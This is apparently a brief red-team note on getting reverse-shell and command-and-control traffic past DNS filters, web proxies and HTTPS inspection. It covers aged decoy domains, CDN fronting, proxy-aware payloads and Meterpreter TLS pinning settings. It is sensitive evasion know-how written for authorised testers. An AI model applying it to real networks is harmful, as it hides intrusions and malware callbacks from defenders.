Filter Bypasses

DNS servers like OpenDNS will compare domain names against a list of known malicious domains. If the computer using the OpenDNS Server tries to access one of the sites on the list it will redirect them to a safe sink hole IP or drop the traffic entirely.

DNS Filters have a category called "Newly Seen Domain" for domains that have not previously been seen by the DNS Server. This means that simply registering a new domain isn't always an effective solution.

This "Newly Seen Domain" category can be bypassed by mass creating domains ahead of time and simulating activity by adding them to search engines and hosting regular content and using OpenDNS to access them for seemingly legitimate use cases in order to get the domain classified as "Clean/Harmless". Using domain names that look like normal sounding domains is recommended, using l33t speak or random UUIDs is a sure fire way to be flagged by DNS Filters. This process may take months to be done correctly. Another option when possible is to make use of a CDN such as cloudfront, wordpress, or azurewebsites.

For Web Proxies the payload used for reverse shell call backs needs to be proxy aware. One method for becoming proxy aware is to abuse the InternetSetOptionA Windows API. Using the appropriate user agent is also an important consideration a user-agent of meterpreter will probably raise some suspicions.

For avoiding HTTPS inspections testers can use TLS certificate pinning to avoid MiTM inspections. HTTPS inspections are typically done by a dedicated device. It's good to assume that traffic will be inspected and plan accordingly. A combination of TLS Certificate pinning and the use of a domain containing the keyword banking should help avoid detection. For meterpreter TLS pinning can be enabled by setting StagerVerifySSLCert to true and configuring HandlerSSLCert with a custom generated certificate.